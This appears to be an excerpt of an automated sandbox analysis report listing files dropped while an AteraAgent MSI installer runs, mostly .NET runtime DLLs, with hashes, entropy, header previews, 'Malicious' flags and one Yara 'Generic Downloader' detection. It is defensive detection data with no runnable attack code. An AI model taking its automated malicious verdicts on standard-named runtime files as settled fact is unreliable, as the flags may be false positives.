                                                                                                                                                                                                                                        Entropy (8bit):6.335250887121676
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:IIkf5nMEPz7omzpq/4Jw1AsDZq7v613eUu8sGzWjK9zv2:wn5tLX62Cu8TzW6zv2
                                                                                                                                                                                                                                        MD5:69338F5C8F7B6567B5E4D83173BD15CD
                                                                                                                                                                                                                                        SHA1:E2846481C76E4720CE86F57BF7864533A7EC753D
                                                                                                                                                                                                                                        SHA-256:31ABD14FFAFD56AB69CC0D7222A8004177F689BBBCBAD7312D8C2FC03F32E2E1
                                                                                                                                                                                                                                        SHA-512:58C721578AE472F4FA275A58483CACA669828254AADEA1457C723E7D353C8D5673736F36C79DA06234C300AB9F361546650A754F6D7EF1CDEF79B5CD2171C806
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l............uU.....x.....x.....x.................x.....x9.....x....Rich...........PE..d...z.lf.........."......h...N.......).........@....................................k+....`....................................................................P.......`)......h.......T...............................8............................................text....f.......h.................. ..`.rdata...6.......8...l..............@..@.data...............................@....pdata..P...........................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\dbgshim.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):140464
                                                                                                                                                                                                                                        Entropy (8bit):6.413381282488342
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:8XY8Ja8dy1+iLfBcGPUZZceOiU8mJ/QQc962jqc413OjgrxkwF+aW/CzWa:QLgDL+vU8mpcoOjgrxkLaQCn
                                                                                                                                                                                                                                        MD5:A826058DA5A74D575C5FBBA98D2DE708
                                                                                                                                                                                                                                        SHA1:B8B628B29BFC99A1CF6565DC0AD941F3A15B67D7
                                                                                                                                                                                                                                        SHA-256:EB642F50E67611DD041AADF3BFCAEC9FF69A3BBDE27D59BD6F38900307D25CE8
                                                                                                                                                                                                                                        SHA-512:07D97B9F87BC16B47487C7193084769C751CC2DFF5CD6D033E1575C978B9A3448045CE6B7DFC2A2C4BAB3C17E889679AFE19671AADFA9C2C8FAFFB78BBCC8171
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@.......................+.......*.......-......./......./.{.....'......................,.....Rich....................PE..d.....lf.........." .....^..........P........................................P......J.....`A............................................(...(........0..........|........(...@..........p.......................(... ...8............p...............................text....\.......^.................. ..`.rdata..Tx...p...z...b..............@..@.data...............................@....pdata..|...........................@..@_RDATA....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\hostpolicy.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):394528
                                                                                                                                                                                                                                        Entropy (8bit):6.311616444156745
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:BBGjtN9JhCdJeD1QL3sQy8XyV0l0gzPI37VPzBz3BUt9OqOHBE/Xb:BBGjtNlU/rsQy8XyxzkZOGX
                                                                                                                                                                                                                                        MD5:99627BE8353E7B34EBDBBBF965470601
                                                                                                                                                                                                                                        SHA1:E60681E3F81B4DCAF304E715878ED9F3984A1BAA
                                                                                                                                                                                                                                        SHA-256:B54E1ACF51C3A876C68E99FF17C5A585AF264CFC25F57D6913EA9BD85FCB25B5
                                                                                                                                                                                                                                        SHA-512:BC162E11BDF84ECB7C0DA3F6FFDAB3380958C8B9C86E9DC4CBF03BC8FE3C5B2D958E11FB373D5944418F687F7F559C1DBECA36B37D1AE4472BB8B58420A7AD6C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ux.U..YU..YU..Y.a.X_..Y.a.X_..Y.a.X...Y\l.YG..Y.f.XP..YU..Y...Y.a.XH..Y.a.XT..Y.a.YT..Y.a.XT..YRichU..Y........PE..d...y.lf.........." .....D...................................................@......Oq....`A............................................ ... ........ ..........$0...... )...0..........p.......................(.......8............`...............................text...,B.......D.................. ..`.rdata...F...`...H...H..............@..@.data...............................@....pdata..$0.......2..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordaccore.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1320360
                                                                                                                                                                                                                                        Entropy (8bit):6.373679704817961
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:W3ccAqMv7jLs0eJqwnSA/RSwn20qv6InSITDHuPGct:W7s7jsjS4znnqyIn7TrvU
                                                                                                                                                                                                                                        MD5:4C295F5F2D61B58ABFFDBEAFC26ED0A0
                                                                                                                                                                                                                                        SHA1:4948926A75605082BF2F2266910A90E526890C75
                                                                                                                                                                                                                                        SHA-256:1CD7F8274A9856A9A5A26AE2414C2DCE6E194F5C7CC0E3B566564F8A8A758C6D
                                                                                                                                                                                                                                        SHA-512:245E4571E5F49281093CCEA9FF488BCE4A73AA4D0DB2423B1E9C9C25192CA02387B3D18C7519B756958139ED99CD27B1A81135CA6F8A8D8575CF682CA5B4FC1F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......eK.!*..!*..!*..(R..+*..s_...*..s_...*..s_..+*...X..%*...X..**..!*..*..._..*..._.. *..._B. *..._.. *..Rich!*..........................PE..d....lf.........." .....(...................................................P.......K....`A............................................p...`........ .......`...........%...0..P...`d..p....................f..(....d..8............@...............................text....'.......(.................. ..`.rdata.......@.......,..............@..@.data....!...0......................@....pdata.......`.......*..............@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc..P....0......................@..B................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordaccore_amd64_amd64_6.0.3224.31407.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1320360
                                                                                                                                                                                                                                        Entropy (8bit):6.373679704817961
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:W3ccAqMv7jLs0eJqwnSA/RSwn20qv6InSITDHuPGct:W7s7jsjS4znnqyIn7TrvU
                                                                                                                                                                                                                                        MD5:4C295F5F2D61B58ABFFDBEAFC26ED0A0
                                                                                                                                                                                                                                        SHA1:4948926A75605082BF2F2266910A90E526890C75
                                                                                                                                                                                                                                        SHA-256:1CD7F8274A9856A9A5A26AE2414C2DCE6E194F5C7CC0E3B566564F8A8A758C6D
                                                                                                                                                                                                                                        SHA-512:245E4571E5F49281093CCEA9FF488BCE4A73AA4D0DB2423B1E9C9C25192CA02387B3D18C7519B756958139ED99CD27B1A81135CA6F8A8D8575CF682CA5B4FC1F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......eK.!*..!*..!*..(R..+*..s_...*..s_...*..s_..+*...X..%*...X..**..!*..*..._..*..._.. *..._B. *..._.. *..Rich!*..........................PE..d....lf.........." .....(...................................................P.......K....`A............................................p...`........ .......`...........%...0..P...`d..p....................f..(....d..8............@...............................text....'.......(.................. ..`.rdata.......@.......,..............@..@.data....!...0......................@....pdata.......`.......*..............@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc..P....0......................@..B................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordbi.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1268256
                                                                                                                                                                                                                                        Entropy (8bit):6.353875443999665
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:+ZdZVsOfVMIVAeZeSuIN5R2kMfmZmogeOaypw7ZSryE0BbdIUtVL0GUix+VgFow6:+ZdZVscj9cSuINr2JeOayeFbpo7iE8oJ
                                                                                                                                                                                                                                        MD5:8C06FB2F713A634561B3DC6E5469DE70
                                                                                                                                                                                                                                        SHA1:4FB727BAC8E600A04D200351600DDDB160487D15
                                                                                                                                                                                                                                        SHA-256:BEAD06E37ED9D1292F205C8F9D1825AF1BA21A1461E1EA1030A16872BC12C854
                                                                                                                                                                                                                                        SHA-512:A624E37FF0A29767C2E04BDC5120D88D48D0DF687F6B48291C5CC7F9CF89FFEF771EC0946EB00030DDC5623DD29B3AB510F9B0EB35C70A2F1DAE6C1C1784B82A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........g.jy4.jy4.jy4...4.jy4..|5.jy4..}5.jy4..z5.jy4'.}5.jy4'.x5.jy4.jx4:jy4>.z5.jy4>.p5.jy4>.y5.jy4>..4.jy4>.{5.jy4Rich.jy4................PE..d.....lf.........." .....n...........................................................U....`A.........................................n..`....p.......`..........D....4.. &...p......`...p.......................(......8............................................text...5l.......n.................. ..`.rdata...............r..............@..@.data...x............t..............@....pdata..D...........................@..@_RDATA.......P......................@..@.rsrc........`......................@..@.reloc.......p......................@..B................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscorlib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):58528
                                                                                                                                                                                                                                        Entropy (8bit):5.6446323123377224
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:l8zO+8uP8x/A15A4HI4gJl01Qa7ICltVvTFClpDuO9zh:yzO+8uA/A15A4o4gJq1DI+vBipzh
                                                                                                                                                                                                                                        MD5:86E65EF2C83159E84F5A7C36EC78867E
                                                                                                                                                                                                                                        SHA1:A0FC2165DAF648BCBAAB3DF2AE0FBAE3FEC0A702
                                                                                                                                                                                                                                        SHA-256:5319693193C2BCBBE56E1090E1EEA513A0145557E40A789BF96F562C0D0CC8E1
                                                                                                                                                                                                                                        SHA-512:A6537F4D68ED63DE7D627B8B321010C83D175E0EA50F33AC5DCC5692EF5BA9620A2BD3572B8F4771ACC1B02ECD5B852482CE1EF75B47C65597D2914F4F1D0A37
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....)..........." ..0.................. ........... ....................... .......>....`.................................l...O.......(................(..............T............................................ ............... ..H............text....... ...................... ..`.rsrc...(...........................@..@.reloc..............................@..B........................H.......P .............................................................BSJB............v4.0.30319......l...pL..#~...L..._..#Strings............#US.........#GUID...........#Blob............T.........3....................................,.....*-.........#.M...&.M.....M...M....h..)...$'....".2.....2...&.2..v$.2... .2.....2.....2...$.2..x..2...1.S.....S..5..]...$.M.................L.....L.....L..)..L..1..L..9..L..A..L..I..L..Q..L..Y..L..a..L..i..L..q..L..y..L.....L ....L.....L..

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscorrc.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):147104
                                                                                                                                                                                                                                        Entropy (8bit):3.8671404588318095
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:9V8Zms10iHvh7x8SKJlZ4vCCk7nw55IvZ4MgSZctpoEXXniizP:9V8Z/aSKlZ4ZGnwmUS4Scnp7
                                                                                                                                                                                                                                        MD5:81556C4545EC2CC21AD218639A0C003B
                                                                                                                                                                                                                                        SHA1:E80EE14AB3EEE7BAA7FF86B07DDD64B38788D4B9
                                                                                                                                                                                                                                        SHA-256:214186149DDF144E9FB1935A7B39FA9393D188CCA6558AE580F3DCB3465ABA5C
                                                                                                                                                                                                                                        SHA-512:99243E57988B7758B8537A43815840509B37CCEB3BEB4B8E6A8086ACB36880D5AA63A4496E16C3BAD34D2D8EDAFF7A240E6FFEC9F60488B6A31D9A957B4CA7C3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j=.I.S.I.S.I.S..~..H.S..~Q.H.S.RichI.S.PE..d.....lf.........." .........................................................@............`.......................................................... ..`................(..............T............................................................................rdata..X...........................@..@.rsrc...`.... ......................@..@......lf........j...l...l.........lf..........................lf........l...................................RSDS..^...qO.h"..c.:....D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscorrc\mscorrc.pdb...............................T....rdata..T........rdata$voltmd...l........rdata$zzzdbg.... .......rsrc$01.....;.......rsrc$02....................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\msquic.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):517032
                                                                                                                                                                                                                                        Entropy (8bit):6.327188439808119
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:DD4t2kjj3Ueh/9WoJcDSdiA9HuUrUb9KcvYCxe3Rw42SISaVGxQJyRMq1KsLGjrT:DDrkjjUoJcDSdiw4QcO3RoS9MV
                                                                                                                                                                                                                                        MD5:B5D0F85E7C820DB76EF2F4535552F03C
                                                                                                                                                                                                                                        SHA1:91EFF42F542175A41549BC966E9B249B65743951
                                                                                                                                                                                                                                        SHA-256:3D6D6E7A6F4729A7A416165BEABDA8A281AFFF082EBB538DF29E8F03E1A4741C
                                                                                                                                                                                                                                        SHA-512:5246EBEAF84A0486FF5ADB2083F60465FC68393D50AF05D17F704D08229CE948860018CBE880C40D5700154C3E61FC735C451044F85E03D78568D60DE80752F7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.................................................................................7...2......2......2.7....._....2......Rich............................PE..d.....Mb.........." .................E.......................................0.......H....`A........................................0y..|....y....... ..h........>.......'... ..........T...............................8............... ............................text...z........................... ..`.rdata...{.......|..................@..@.data...p2...........r..............@....pdata...>.......@...~..............@..@_RDATA..............................@..@.rsrc...h.... ......................@..@.reloc....... ......................@..B........................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\netstandard.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):101664
                                                                                                                                                                                                                                        Entropy (8bit):5.505707682437033
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:oiTrnaN0HjO8MZYq5V4bgDHsPdPpwSJ5L3Akcg9Qc7WUEp4za:JaN8qZYe4bgDUnNKc7nXm
                                                                                                                                                                                                                                        MD5:6F476F66A2C6228DA38FE6C7ED7CA439
                                                                                                                                                                                                                                        SHA1:2C13ABA2E1A19F00C98A1AB82066512B6B555375
                                                                                                                                                                                                                                        SHA-256:78798868341E36FC9B782AB9313CC7035C5173509552F4BB95B44A5D0D044B23
                                                                                                                                                                                                                                        SHA-512:C3E5132101845D821D040ABE97EE2EA07D04135ADFD11E880D08000C8B03ECC7853AF7CEE5BF18C07361F29C5867D9A7120F6F1D4053F624E25F6021C8E03367
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\netstandard.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%$..........." ..0..Z..........6x... ........... ....................................`..................................w..O.......8............d.. )...........w..T............................................ ............... ..H............text...<X... ...Z.................. ..`.rsrc...8............\..............@..@.reloc...............b..............@..B.................x......H.......P ..DV...................v......................................BSJB............v4.0.30319......l.......#~..,.......#Strings.....R......#US..R......#GUID....R..P...#Blob............T.........3................................U...(......H.........5*....;*....'8.........., A...7.J..P4*U..5#*U...:*U..n7*U..&1*U....*U.../*U..(7*U...(*U...T-..../-...i&....7*................./...../...../...)./...1./...9./...A./...I./...Q./...Y./...a./...i./...q./...y./...../. .../...../...

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\ucrtbase.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1122768
                                                                                                                                                                                                                                        Entropy (8bit):6.6466118295886165
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:CJG2BrB3ZQAq0AT2jS9HKHdK6AccMs1wmxvSZX0ypFi:0VGrT6SAk3ei
                                                                                                                                                                                                                                        MD5:3B337C2D41069B0A1E43E30F891C3813
                                                                                                                                                                                                                                        SHA1:EBEE2827B5CB153CBBB51C9718DA1549FA80FC5C
                                                                                                                                                                                                                                        SHA-256:C04DAEBA7E7C4B711D33993AB4C51A2E087F98F4211AEA0DCB3A216656BA0AB7
                                                                                                                                                                                                                                        SHA-512:FDB3012A71221447B35757ED2BDCA6ED1F8833B2F81D03AABEBD2CD7780A33A9C3D816535D03C5C3EDD5AAF11D91156842B380E2A63135E3C7F87193AD211499
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T...:K..:K..:K..K..:K..;K..:KK..K..:KK.:J..:KK.9J..:KK.?J..:KK.>J.:KK.4J..:KK..K..:KK.8J..:KRich..:K........PE..d................" .....0..........0^...............................................N....`A................................................................. ...........!...... .......p............................Z..8..............(............................text...X .......0.................. ..`.rdata......@.......@..............@..@.data....&....... ..................@....pdata....... ......................@..@.rsrc...............................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AteraAgent.exe.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2402
                                                                                                                                                                                                                                        Entropy (8bit):5.362731083469072
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:MxHKQg8mHDp684IHTQ06YHKGSI6oPtHTHhAHKKk+HKlT4v1qHGIs0HKaHKmTHlH7:iqzCIzQ06YqGSI6oPtzHeqKk+qZ4vwme
                                                                                                                                                                                                                                        MD5:28B4BFE9130A35038BD57B2F89847BAE
                                                                                                                                                                                                                                        SHA1:8DBF9D2800AB08CCA18B4BA00549513282B774A9
                                                                                                                                                                                                                                        SHA-256:19F498CAE589207075B8C82D7DACEAE23997D61B93A971A4F049DC14C8A3D514
                                                                                                                                                                                                                                        SHA-512:02100FD4059C4D32FBAAA9CEAACB14C50A4359E4217203B2F7A40E298AD819ED5469F2442291F12852527A2B7109CC5F7BFF7FDAD53BA5ABF75FC5F0474E984F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Serv759bfb78#\e2ca4e2ddffdc0d0bda3f2ca65249790\System.ServiceProcess.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\434f871c532673e1359654ad68a1c225\System.Configuration.Install.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\a

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):651
                                                                                                                                                                                                                                        Entropy (8bit):5.343677015075984
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yiv:ML9E4KlKDE4KhKiKhPKIE4oKNzKoM
                                                                                                                                                                                                                                        MD5:7EEF860682F76EC7D541A8C1A3494E3D
                                                                                                                                                                                                                                        SHA1:58D759A845D2D961A5430E429EF777E60C48C87E
                                                                                                                                                                                                                                        SHA-256:65E958955AC5DBB7D7AD573EB4BB36BFF4A1DC52DD16CF79A5F7A0FA347727F1
                                                                                                                                                                                                                                        SHA-512:BF7767D55F624B8404240953A726AA616D0CE60EC1B3027710B919D6838EFF7281A79B49B22AB8B065D8CA921EF4D09017A0991CB4A21DAF09B3B43E6698CB04
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..

                                                                                                                                                                                                                                        C:\Windows\Installer\4c998e.msi

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2994176
                                                                                                                                                                                                                                        Entropy (8bit):7.878684894941199
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:z+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:z+lUlz9FKbsodq0YaH7ZPxMb8tT
                                                                                                                                                                                                                                        MD5:50159E0E7ACFD900E3190F860297D1E6
                                                                                                                                                                                                                                        SHA1:D4F6302266269F2BDDFAAA96625DD3D391E11E25
                                                                                                                                                                                                                                        SHA-256:9104930A661AF5E641AD911FC30C0887433713EA589E389F06CBD5BB0A7ED5AD
                                                                                                                                                                                                                                        SHA-512:BDD424B5DDADAE02A8A4D16CF67268613544A313C0E33F213B5BA2CF7130504596B9F2092B7C7A6660DA7DF54F779A8C2B472E243777DB5DC34E35EB732A9488
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\4c9990.msi

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2994176
                                                                                                                                                                                                                                        Entropy (8bit):7.878684894941199
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:z+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:z+lUlz9FKbsodq0YaH7ZPxMb8tT
                                                                                                                                                                                                                                        MD5:50159E0E7ACFD900E3190F860297D1E6
                                                                                                                                                                                                                                        SHA1:D4F6302266269F2BDDFAAA96625DD3D391E11E25
                                                                                                                                                                                                                                        SHA-256:9104930A661AF5E641AD911FC30C0887433713EA589E389F06CBD5BB0A7ED5AD
                                                                                                                                                                                                                                        SHA-512:BDD424B5DDADAE02A8A4D16CF67268613544A313C0E33F213B5BA2CF7130504596B9F2092B7C7A6660DA7DF54F779A8C2B472E243777DB5DC34E35EB732A9488
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\4c9991.msi

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
